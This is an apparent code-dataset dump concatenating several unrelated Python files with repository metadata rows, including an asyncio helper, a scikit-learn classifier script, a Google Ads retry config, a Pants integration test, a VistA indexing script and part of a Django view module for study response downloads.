if 'encoding' in params:
options['encoding'] = params['encoding']
if 'errors' in params:
options['errors'] = params['errors']
if 'ssl' in params:
assert params['ssl'] in ('true', 'false'), (
"Expected 'ssl' param to be 'true' or 'false' only",
params['ssl'])
options['ssl'] = params['ssl'] == 'true'
if 'timeout' in params:
options['timeout'] = float(params['timeout'])
return options
class CloseEvent:
def __init__(self, on_close):
self._close_init = asyncio.Event()
self._close_done = asyncio.Event()
self._on_close = on_close
async def wait(self):
await self._close_init.wait()
await self._close_done.wait()
def is_set(self):
return self._close_done.is_set() or self._close_init.is_set()
def set(self):
if self._close_init.is_set():
return
task = asyncio.ensure_future(self._on_close())
task.add_done_callback(self._cleanup)
self._close_init.set()
def _cleanup(self, task):
self._on_close = None
self._close_done.set()
get_event_loop = getattr(asyncio, 'get_running_loop', asyncio.get_event_loop)
| true | true |
f72ed7c91647a2ffe95753344f2a7f08a78ecf34 | 1,683 | py | Python | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | null | null | null | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | 5 | 2021-03-10T17:10:21.000Z | 2021-10-06T16:34:17.000Z | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | null | null | null | # Import libraries
import numpy as np
print('imported numpy')
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import pandas as pd
#Otsustuspuud
from sklearn.tree import DecisionTreeClassifier
print('imported all')
data_table = pd.read_csv('postags_lemmas_levels_data.csv')
data_table = data_table.drop(['Unnamed: 0','tekstikood', 'filename'], 1)
print('read data')
# data_table.groupby("keeletase").A.plot(kind='kde')
#data_table.groupby("keeletase").A.hist(alpha=0.4)|
from sklearn.preprocessing import LabelEncoder
labelencoder_0 = LabelEncoder() #independent variable encoder
data_table.iloc[:,17] = labelencoder_0.fit_transform(data_table.iloc[:,17])
#Transforming values into percentages of total and splitting into target and features
features = data_table.loc[:, "A":"Z"]
target_var = data_table.loc[:, "keeletase"]
print('split to test and train')
# X_train, X_test, y_train, y_test =\
# train_test_split(features.loc[:,'A':"Z"], target_var, test_size = 0.5, random_state=1111)
# Get the dataset
# dataset = datasets.load_iris()
# Split the dataset into features and labels
X = features
y = target_var
# Split the dataset into training (80%) and testing (20%) data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0, shuffle = True)
# Build the classifier and make prediction
classifier = DecisionTreeClassifier()
classifier.fit(X_train, y_train)
print('fit trainging data')
prediction = classifier.predict(X_test)
# Print the confusion matrix
# Save the model to disk
joblib.dump(classifier, 'classifier.joblib')
| 25.5 | 108 | 0.764112 |
import numpy as np
print('imported numpy')
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import pandas as pd
from sklearn.tree import DecisionTreeClassifier
print('imported all')
data_table = pd.read_csv('postags_lemmas_levels_data.csv')
data_table = data_table.drop(['Unnamed: 0','tekstikood', 'filename'], 1)
print('read data')
from sklearn.preprocessing import LabelEncoder
labelencoder_0 = LabelEncoder()
data_table.iloc[:,17] = labelencoder_0.fit_transform(data_table.iloc[:,17])
features = data_table.loc[:, "A":"Z"]
target_var = data_table.loc[:, "keeletase"]
print('split to test and train')
X = features
y = target_var
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0, shuffle = True)
classifier = DecisionTreeClassifier()
classifier.fit(X_train, y_train)
print('fit trainging data')
prediction = classifier.predict(X_test)
joblib.dump(classifier, 'classifier.joblib')
| true | true |
f72ed89ef91faf30d9d61698bce073331a1ee00a | 1,185 | py | Python | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | config = {
"interfaces": {
"google.ads.googleads.v6.services.SearchTermViewService": {
"retry_codes": {
"retry_policy_1_codes": [
"UNAVAILABLE",
"DEADLINE_EXCEEDED"
],
"no_retry_codes": []
},
"retry_params": {
"retry_policy_1_params": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
},
"no_retry_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 0.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 0,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 0,
"total_timeout_millis": 0
}
},
"methods": {
"GetSearchTermView": {
"timeout_millis": 60000,
"retry_codes_name": "retry_policy_1_codes",
"retry_params_name": "retry_policy_1_params"
}
}
}
}
}
| 28.902439 | 63 | 0.562025 | config = {
"interfaces": {
"google.ads.googleads.v6.services.SearchTermViewService": {
"retry_codes": {
"retry_policy_1_codes": [
"UNAVAILABLE",
"DEADLINE_EXCEEDED"
],
"no_retry_codes": []
},
"retry_params": {
"retry_policy_1_params": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
},
"no_retry_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 0.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 0,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 0,
"total_timeout_millis": 0
}
},
"methods": {
"GetSearchTermView": {
"timeout_millis": 60000,
"retry_codes_name": "retry_policy_1_codes",
"retry_params_name": "retry_policy_1_params"
}
}
}
}
}
| true | true |
f72ed8da97fec762efa00349e44eae5dbdee44f0 | 1,233 | py | Python | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import re
from pants.testutil.pants_integration_test import (
ensure_daemon,
run_pants_with_workdir,
temporary_workdir,
)
from pants.util.contextutil import overwrite_file_content
from pants.util.dirutil import read_file
@ensure_daemon
def test_fmt_then_edit():
f = "examples/src/python/example/hello/greet/greet.py"
with temporary_workdir() as workdir:
def run() -> None:
run_pants_with_workdir(
[
"--backend-packages=['pants.backend.python', 'pants.backend.python.lint.black']",
"fmt",
f,
],
workdir=workdir,
).assert_success()
# Run once to start up, and then capture the file content.
run()
good_content = read_file(f)
# Edit the file.
with overwrite_file_content(f, lambda c: re.sub(b"def greet", b"def greet", c)):
assert good_content != read_file(f)
# Re-run and confirm that the file was fixed.
run()
assert good_content == read_file(f)
| 30.073171 | 101 | 0.612328 |
import re
from pants.testutil.pants_integration_test import (
ensure_daemon,
run_pants_with_workdir,
temporary_workdir,
)
from pants.util.contextutil import overwrite_file_content
from pants.util.dirutil import read_file
@ensure_daemon
def test_fmt_then_edit():
f = "examples/src/python/example/hello/greet/greet.py"
with temporary_workdir() as workdir:
def run() -> None:
run_pants_with_workdir(
[
"--backend-packages=['pants.backend.python', 'pants.backend.python.lint.black']",
"fmt",
f,
],
workdir=workdir,
).assert_success()
run()
good_content = read_file(f)
with overwrite_file_content(f, lambda c: re.sub(b"def greet", b"def greet", c)):
assert good_content != read_file(f)
run()
assert good_content == read_file(f)
| true | true |
f72ed91758bdb810aba2360a35143bf14981d80f | 1,179 | py | Python | XINDEXScript.py | JimDeanSpivey/ATF-for-Vista-FOIA | fbc07e98e307dee192fa1ca8cbf0137895376847 | [
"Apache-2.0"
] | 1 | 2015-12-10T20:45:34.000Z | 2015-12-10T20:45:34.000Z | XINDEXScript.py | JimDeanSpivey/ATF-for-Vista-FOIA | fbc07e98e307dee192fa1ca8cbf0137895376847 | [
"Apache-2.0"
] | null | null | null | XINDEXScript.py | JimDeanSpivey/ATF-for-Vista-FOIA | fbc07e98e307dee192fa1ca8cbf0137895376847 | [
"Apache-2.0"
] | null | null | null | import sys
sys.path = [sys.argv[7] + '/lib/vista'] + sys.path
from OSEHRAHelper import ConnectToMUMPS,PROMPT
VistA=ConnectToMUMPS(sys.argv[1],sys.argv[3],sys.argv[4])
if (sys.argv[5] and sys.argv[6]):
VistA.login(sys.argv[5],sys.argv[6])
if VistA.type=='cache':
try:
VistA.ZN(sys.argv[4])
except IndexError,no_namechange:
pass
VistA.wait(PROMPT)
VistA.write('K ^XUTL("XQ",$J)')
VistA.write('D ^XINDEX')
if VistA.type == 'cache':
VistA.wait('No =>')
VistA.write('No')
arglist = sys.argv[2].split(',')
for routine in arglist:
VistA.wait('Routine:')
VistA.write(routine)
VistA.wait('Routine:')
VistA.write('')
selectionList = ['Select BUILD NAME:',
'Select INSTALL NAME:',
'Select PACKAGE NAME:']
while True:
index = VistA.multiwait(selectionList)
VistA.write('')
if index == len(selectionList) - 1:
break
VistA.wait('warnings?')
VistA.write('No')
VistA.wait('routines?')
VistA.write('NO')
VistA.wait('DEVICE:')
VistA.write(';;9999')
if sys.platform == 'win32':
VistA.wait('Right Margin:')
VistA.write('')
VistA.write('')
VistA.wait('continue:',60)
VistA.write('')
VistA.wait('--- END ---',60)
VistA.write('h') | 25.085106 | 57 | 0.649703 | import sys
sys.path = [sys.argv[7] + '/lib/vista'] + sys.path
from OSEHRAHelper import ConnectToMUMPS,PROMPT
VistA=ConnectToMUMPS(sys.argv[1],sys.argv[3],sys.argv[4])
if (sys.argv[5] and sys.argv[6]):
VistA.login(sys.argv[5],sys.argv[6])
if VistA.type=='cache':
try:
VistA.ZN(sys.argv[4])
except IndexError,no_namechange:
pass
VistA.wait(PROMPT)
VistA.write('K ^XUTL("XQ",$J)')
VistA.write('D ^XINDEX')
if VistA.type == 'cache':
VistA.wait('No =>')
VistA.write('No')
arglist = sys.argv[2].split(',')
for routine in arglist:
VistA.wait('Routine:')
VistA.write(routine)
VistA.wait('Routine:')
VistA.write('')
selectionList = ['Select BUILD NAME:',
'Select INSTALL NAME:',
'Select PACKAGE NAME:']
while True:
index = VistA.multiwait(selectionList)
VistA.write('')
if index == len(selectionList) - 1:
break
VistA.wait('warnings?')
VistA.write('No')
VistA.wait('routines?')
VistA.write('NO')
VistA.wait('DEVICE:')
VistA.write(';;9999')
if sys.platform == 'win32':
VistA.wait('Right Margin:')
VistA.write('')
VistA.write('')
VistA.wait('continue:',60)
VistA.write('')
VistA.wait('--- END ---',60)
VistA.write('h') | false | true |
f72ed91db2e8e38da901631f369f411c385dca7e | 1,057 | py | Python | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | import math
import os
import queue
import random
import threading
import time
from pprint import pprint
from networkx import DiGraph
from Node import Switch
class my_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.flow_queue = []
def run(self) -> None:
while True:
num = random.randint(1, 10)
self.flow_queue.append(num)
print(self.flow_queue)
sleep_time = random.randint(1, 3)
print('sleep ', sleep_time)
time.sleep(sleep_time)
sw_num = 40
flow_thread_num = 10
path_len = 6.384
flow_num = sw_num * flow_thread_num / 2
flow_table_num=flow_num*path_len
switch_big=flow_table_num/5/sw_num
switch_small=switch_big*4
switch_sum=flow_table_num/sw_num
controller_big= switch_big*(sw_num/4)
controller_small=controller_big*4
print(controller_big)
class C:
def __init__(self,name):
self.name=name
def __str__(self):
return self.name
c1=C('c1')
c2=C('c2')
temp=c1
c1=c2
print(temp)
print(c1)
| 19.218182 | 45 | 0.689688 | import math
import os
import queue
import random
import threading
import time
from pprint import pprint
from networkx import DiGraph
from Node import Switch
class my_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.flow_queue = []
def run(self) -> None:
while True:
num = random.randint(1, 10)
self.flow_queue.append(num)
print(self.flow_queue)
sleep_time = random.randint(1, 3)
print('sleep ', sleep_time)
time.sleep(sleep_time)
sw_num = 40
flow_thread_num = 10
path_len = 6.384
flow_num = sw_num * flow_thread_num / 2
flow_table_num=flow_num*path_len
switch_big=flow_table_num/5/sw_num
switch_small=switch_big*4
switch_sum=flow_table_num/sw_num
controller_big= switch_big*(sw_num/4)
controller_small=controller_big*4
print(controller_big)
class C:
def __init__(self,name):
self.name=name
def __str__(self):
return self.name
c1=C('c1')
c2=C('c2')
temp=c1
c1=c2
print(temp)
print(c1)
| true | true |
f72eda0648c579ea231b336ff3104e38d1b2f1b9 | 777 | py | Python | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | '''
Crie uma tupla preenchida com os 20 times do brasileirão da série A na ordem de colocação.
Depois mostre:
a: Os 5 primeiros colocados
b: Os últimos 4 colocados
c: times em ordem alfabética
d: em que posição está o time da Chapecoense?
'''
times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
'Chapecoense', 'Atlético-MG', 'Botafogo', 'Atlético-PR', 'Bahia', 'São Paulo',
'Fluminense', 'Sport', 'Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')
print('Os 5 primeiros colocados são: {}'.format(times[0:5]))
print('Os 4 últimos colocados: {}'.format(times[-4:]))
print('Os times em ordem alfabética: {}'.format(sorted(times)))
print('O Chapecoense está na posição: {}'.format(times.index('Chapecoense') + 1))
| 45.705882 | 92 | 0.683398 |
times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
'Chapecoense', 'Atlético-MG', 'Botafogo', 'Atlético-PR', 'Bahia', 'São Paulo',
'Fluminense', 'Sport', 'Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')
print('Os 5 primeiros colocados são: {}'.format(times[0:5]))
print('Os 4 últimos colocados: {}'.format(times[-4:]))
print('Os times em ordem alfabética: {}'.format(sorted(times)))
print('O Chapecoense está na posição: {}'.format(times.index('Chapecoense') + 1))
| true | true |
f72edb8b6c0044eda2bec7da52e82df5b9432d92 | 80,572 | py | Python | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 9 | 2018-06-26T17:15:27.000Z | 2021-11-21T17:19:01.000Z | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 496 | 2018-02-19T19:18:24.000Z | 2022-03-31T17:01:16.000Z | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 16 | 2018-07-06T23:35:39.000Z | 2021-11-21T17:52:58.000Z | import io
import json
import zipfile
from functools import cached_property
from typing import Callable, Dict, KeysView, List, NamedTuple, Set, Union
import requests
from django.contrib import messages
from django.contrib.auth.mixins import UserPassesTestMixin
from django.core.exceptions import ObjectDoesNotExist, SuspiciousOperation
from django.core.files import File
from django.core.paginator import Paginator
from django.db.models import Prefetch
from django.http import (
FileResponse,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
StreamingHttpResponse,
)
from django.shortcuts import redirect, reverse
from django.views import generic
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.list import MultipleObjectMixin
from accounts.utils import (
hash_child_id,
hash_demographic_id,
hash_id,
hash_participant_id,
)
from exp.utils import (
RESPONSE_PAGE_SIZE,
csv_dict_output_and_writer,
csv_namedtuple_writer,
flatten_dict,
round_age,
round_ages_from_birthdays,
study_name_for_files,
)
from exp.views.mixins import (
CanViewStudyResponsesMixin,
ResearcherLoginRequiredMixin,
SingleObjectFetchProtocol,
StudyLookupMixin,
)
from studies.models import Feedback, Response, Study, Video
from studies.permissions import StudyPermission
from studies.queries import (
get_consent_statistics,
get_responses_with_current_rulings_and_videos,
)
from studies.tasks import build_framedata_dict, build_zipfile_of_videos
class ResponseDataColumn(NamedTuple):
    """Definition of one column offered in response/demographic data downloads.

    Pairs a column identifier with the logic to extract its value from a
    response, plus metadata controlling whether the column is optional in the
    download form and whether its presence marks the file as identifiable.
    """

    # id: Unique key to identify data. Used as CSV column header and any portion before __ is used to create a
    # sub-dictionary for JSON data.
    id: str
    description: str  # Description for data dictionary
    extractor: Callable[
        [Union[Response, Dict]], Union[str, List]
    ]  # Function to extract value from response instance or dict
    optional: bool = False  # is a column the user checks a box to include?
    name: str = ""  # used in template form for optional columns
    include_by_default: bool = False  # whether to initially check checkbox for field
    identifiable: bool = False  # used to determine filename signaling
# Columns for response downloads. Extractor functions expect Response instance.
# Column order here determines download column order; get_response_headers
# relies on the last two entries being response__sequence and
# response__conditions, which receive special handling.
# (Fix: a duplicated consent__time entry was removed so the column appears
# exactly once in downloads.)
RESPONSE_COLUMNS = [
    ResponseDataColumn(
        id="response__id",
        description="Short ID for this response",
        extractor=lambda resp: str(resp.id),
        name="Response ID",
    ),
    ResponseDataColumn(
        id="response__uuid",
        description="Unique identifier for response. Can be used to match data to video filenames.",
        extractor=lambda resp: str(resp.uuid),
        name="Response UUID",
    ),
    ResponseDataColumn(
        id="response__date_created",
        description="Timestamp for when participant began session, in format e.g. 2019-11-07 17:13:38.702958+00:00",
        extractor=lambda resp: str(resp.date_created),
        name="Date created",
    ),
    ResponseDataColumn(
        id="response__completed",
        description=(
            "Whether the participant submitted the exit survey; depending on study criteria, this may not align "
            "with whether the session is considered complete. E.g., participant may have left early but submitted "
            "exit survey, or may have completed all test trials but not exit survey."
        ),
        extractor=lambda resp: resp.completed,
        name="Completed",
    ),
    ResponseDataColumn(
        id="response__withdrawn",
        description=(
            "Whether the participant withdrew permission for viewing/use of study video beyond consent video. If "
            "true, video will not be available and must not be used."
        ),
        extractor=lambda resp: resp.withdrawn,
        name="Withdrawn",
    ),
    ResponseDataColumn(
        id="response__parent_feedback",
        description=(
            "Freeform parent feedback entered into the exit survey, if any. This field may incidentally contain "
            "identifying or sensitive information depending on what parents say, so it should be scrubbed or "
            "omitted from published data."
        ),
        extractor=lambda resp: resp.parent_feedback,
        name="Parent feedback",
    ),
    ResponseDataColumn(
        id="response__birthdate_difference",
        description=(
            "Difference between birthdate entered in exit survey, if any, and birthdate of registered child "
            "participating. Positive values mean that the birthdate from the exit survey is LATER. Blank if "
            "no birthdate available from the exit survey."
        ),
        extractor=lambda resp: resp.birthdate_difference,
        name="Birthdate difference",
    ),
    ResponseDataColumn(
        id="response__video_privacy",
        description=(
            "Privacy level for videos selected during the exit survey, if the parent completed the exit survey. "
            "Possible levels are 'private' (only people listed on your IRB protocol can view), 'scientific' "
            "(can share for scientific/educational purposes), and 'public' (can also share for publicity). "
            "In no cases may videos be shared for commercial purposes. If this is missing (e.g., family stopped "
            "just after the consent form and did not complete the exit survey), you must treat the video as "
            "private."
        ),
        extractor=lambda resp: resp.privacy,
        name="Video privacy level",
    ),
    ResponseDataColumn(
        id="response__databrary",
        description=(
            "Whether the parent agreed to share video data on Databrary - 'yes' or 'no'. If missing, you must "
            "treat the video as if 'no' were selected. If 'yes', the video privacy selections also apply to "
            "authorized Databrary users."
        ),
        extractor=lambda resp: resp.databrary,
        name="Databrary sharing",
    ),
    ResponseDataColumn(
        id="response__is_preview",
        description=(
            "Whether this response was generated by a researcher previewing the experiment. Preview data should "
            "not be used in any actual analyses."
        ),
        extractor=lambda resp: resp.is_preview,
        name="Preview",
    ),
    ResponseDataColumn(
        id="consent__ruling",
        description=(
            "Most recent consent video ruling: one of 'accepted' (consent has been reviewed and judged to indicate "
            "informed consent), 'rejected' (consent has been reviewed and judged not to indicate informed "
            "consent -- e.g., video missing or parent did not read statement), or 'pending' (no current judgement, "
            "e.g. has not been reviewed yet or waiting on parent email response)"
        ),
        extractor=lambda resp: resp.most_recent_ruling,
    ),
    ResponseDataColumn(
        id="consent__arbiter",
        description="Name associated with researcher account that made the most recent consent ruling",
        extractor=lambda resp: resp.most_recent_ruling_arbiter,
    ),
    ResponseDataColumn(
        id="consent__time",
        description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
        extractor=lambda resp: resp.most_recent_ruling_date,
    ),
    ResponseDataColumn(
        id="consent__comment",
        description=(
            "Comment associated with most recent consent ruling (may be used to track e.g. any cases where consent "
            "was confirmed by email)"
        ),
        extractor=lambda resp: resp.most_recent_ruling_comment,
    ),
    ResponseDataColumn(
        id="study__uuid",
        description="Unique identifier of study associated with this response. Same for all responses to a given Lookit study.",
        extractor=lambda resp: str(resp.study.uuid),
    ),
    ResponseDataColumn(
        id="participant__global_id",
        description=(
            "Unique identifier for family account associated with this response. Will be the same for multiple "
            "responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
            "PUBLICATION because this allows identification of families across different published studies, which "
            "may have unintended privacy consequences. Researchers can use this ID to match participants across "
            "studies (subject to their own IRB review), but would need to generate their own random participant "
            "IDs for publication in that case. Use participant_hashed_id as a publication-safe alternative if "
            "only analyzing data from one Lookit study."
        ),
        extractor=lambda resp: str(resp.child.user.uuid),
        optional=True,
        name="Parent global ID",
        include_by_default=False,
        identifiable=True,
    ),
    ResponseDataColumn(
        id="participant__hashed_id",
        description=(
            "Identifier for family account associated with this response. Will be the same for multiple responses "
            "from a child and for siblings, but is unique to this study. This may be published directly."
        ),
        extractor=lambda resp: hash_id(
            resp.child.user.uuid,
            resp.study.uuid,
            resp.study.salt,
            resp.study.hash_digits,
        ),
        name="Parent ID",
    ),
    ResponseDataColumn(
        id="participant__nickname",
        description=(
            "Nickname associated with the family account for this response - generally the mom or dad's name. "
            "Must be redacted for publication."
        ),
        extractor=lambda resp: resp.child.user.nickname,
        optional=True,
        name="Parent name",
        include_by_default=False,
        identifiable=True,
    ),
    ResponseDataColumn(
        id="child__global_id",
        description=(
            "Primary unique identifier for the child associated with this response. Will be the same for multiple "
            "responses from one child, even across different Lookit studies. MUST BE REDACTED FOR PUBLICATION "
            "because this allows identification of children across different published studies, which may have "
            "unintended privacy consequences. Researchers can use this ID to match participants across studies "
            "(subject to their own IRB review), but would need to generate their own random participant IDs for "
            "publication in that case. Use child_hashed_id as a publication-safe alternative if only analyzing "
            "data from one Lookit study."
        ),
        extractor=lambda resp: str(resp.child.uuid),
        optional=True,
        name="Child global ID",
        include_by_default=False,
        identifiable=True,
    ),
    ResponseDataColumn(
        id="child__hashed_id",
        description=(
            "Identifier for child associated with this response. Will be the same for multiple responses from a "
            "child, but is unique to this study. This may be published directly."
        ),
        extractor=lambda resp: hash_id(
            resp.child.uuid, resp.study.uuid, resp.study.salt, resp.study.hash_digits
        ),
        name="Child ID",
    ),
    ResponseDataColumn(
        id="child__name",
        description=(
            "Nickname for the child associated with this response. Not necessarily a real name (we encourage "
            "initials, nicknames, etc. if parents aren't comfortable providing a name) but must be redacted for "
            "publication of data."
        ),
        extractor=lambda resp: resp.child.given_name,
        optional=True,
        name="Child name",
        include_by_default=False,
        identifiable=True,
    ),
    ResponseDataColumn(
        id="child__birthday",
        description=(
            "Birthdate of child associated with this response. Must be redacted for publication of data (switch to "
            "age at time of participation; either use rounded age, jitter the age, or redact timestamps of "
            "participation)."
        ),
        extractor=lambda resp: resp.child.birthday,
        optional=True,
        name="Birthdate",
        include_by_default=False,
        identifiable=True,
    ),
    ResponseDataColumn(
        id="child__age_in_days",
        description=(
            "Age in days at time of response of child associated with this response, exact. This can be used in "
            "conjunction with timestamps to calculate the child's birthdate, so must be jittered or redacted prior "
            "to publication unless no timestamp information is shared."
        ),
        # NOTE(review): unlike child__age_rounded below, no guard for a missing
        # birthday/date_created here -- confirm these are always set when this
        # optional column is selected.
        extractor=lambda resp: (resp.date_created.date() - resp.child.birthday).days,
        optional=True,
        name="Age in days",
        include_by_default=False,
        identifiable=True,
    ),
    ResponseDataColumn(
        id="child__age_rounded",
        description=(
            "Age in days at time of response of child associated with this response, rounded to the nearest 10 "
            "days if under 1 year old and to the nearest 30 days if over 1 year old. May be published; however, if "
            "you have more than a few sessions per participant it would be possible to infer the exact age in days "
            "(and therefore birthdate) with some effort. In this case you might consider directly jittering "
            "birthdates."
        ),
        extractor=lambda resp: str(
            round_age(int((resp.date_created.date() - resp.child.birthday).days))
        )
        if (resp.date_created and resp.child.birthday)
        else "",
        optional=True,
        name="Rounded age",
        include_by_default=True,
        identifiable=False,
    ),
    ResponseDataColumn(
        id="child__gender",
        description=(
            "Parent-identified gender of child, one of 'm' (male), 'f' (female), 'o' (other), or 'na' (prefer not "
            "to answer)"
        ),
        extractor=lambda resp: resp.child.gender,
        optional=True,
        name="Child gender",
        include_by_default=True,
        identifiable=False,
    ),
    ResponseDataColumn(
        id="child__age_at_birth",
        description=(
            "Gestational age at birth in weeks. One of '40 or more weeks', '39 weeks' through '24 weeks', "
            "'Under 24 weeks', or 'Not sure or prefer not to answer'"
        ),
        extractor=lambda resp: resp.child.age_at_birth,
        optional=True,
        name="Child gestational age",
        include_by_default=True,
        identifiable=False,
    ),
    ResponseDataColumn(
        id="child__language_list",
        description="List of languages spoken (using language codes in Lookit docs), separated by spaces",
        extractor=lambda resp: resp.child.language_list,
        optional=True,
        name="Child languages",
        include_by_default=True,
        identifiable=False,
    ),
    ResponseDataColumn(
        id="child__condition_list",
        description="List of child characteristics (using condition/characteristic codes in Lookit docs), separated by spaces",
        extractor=lambda resp: resp.child.condition_list,
        optional=True,
        name="Child conditions",
        include_by_default=True,
        identifiable=False,
    ),
    ResponseDataColumn(
        id="child__additional_information",
        description=(
            "Free response 'anything else you'd like us to know' field on child registration form for child "
            "associated with this response. Should be redacted or reviewed prior to publication as it may include "
            "names or other identifying information."
        ),
        extractor=lambda resp: resp.child.additional_information,
        optional=True,
        name="Child additional information",
        include_by_default=True,
        identifiable=True,
    ),
    ResponseDataColumn(
        id="response__sequence",
        description=(
            "Each response_sequence.N field (response_sequence.0, response_sequence.1, etc.) gives the ID of the "
            "Nth frame displayed during the session associated with this response. Responses may have different "
            "sequences due to randomization or if a participant leaves early."
        ),
        extractor=lambda resp: resp.sequence,
        name="Response sequence",
    ),
    ResponseDataColumn(
        id="response__conditions",
        description=(
            "RESEARCHERS: EXPAND THIS SECTION BASED ON YOUR INDIVIDUAL STUDY. Each set of "
            "response_conditions.N.(...) fields give information about condition assignment during a particular "
            "frame of this study. response_conditions.0.frameName is the frame ID (corresponding to a value in "
            "response_sequence) where the randomization occurred. Additional fields such as "
            "response_conditions.0.conditionNum depend on the specific randomizer frames used in this study."
        ),
        extractor=lambda resp: [
            {**{"frameName": cond_frame}, **conds}
            for (cond_frame, conds) in resp.conditions.items()
        ],
    ),
]
# Columns for demographic data downloads. Extractor functions expect Response values dict,
# rather than instance.
# (Fixes: copy-pasted display names corrected for parent gender and spouse
# education level; income range typo corrected.)
DEMOGRAPHIC_COLUMNS = [
    ResponseDataColumn(
        id="response__uuid",
        description=(
            "Primary unique identifier for response. Can be used to match demographic data to response data "
            "and video filenames; must be redacted prior to publication if videos are also published."
        ),
        extractor=lambda resp: str(resp["uuid"]),
        name="Response UUID",
    ),
    ResponseDataColumn(
        id="participant__global_id",
        description=(
            "Unique identifier for family account associated with this response. Will be the same for multiple "
            "responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
            "PUBLICATION because this allows identification of families across different published studies, "
            "which may have unintended privacy consequences. Researchers can use this ID to match participants "
            "across studies (subject to their own IRB review), but would need to generate their own random "
            "participant IDs for publication in that case. Use participant__hashed_id as a publication-safe "
            "alternative if only analyzing data from one Lookit study."
        ),
        extractor=lambda resp: str(resp["child__user__uuid"]),
        optional=True,
        name="Parent global ID",
        include_by_default=False,
        identifiable=True,
    ),
    ResponseDataColumn(
        id="participant__hashed_id",
        description=(
            "Identifier for family account associated with this response. Will be the same for multiple "
            "responses from a child and for siblings, but is unique to this study. This may be published "
            "directly."
        ),
        extractor=lambda resp: hash_participant_id(resp),
        name="Participant ID",
    ),
    ResponseDataColumn(
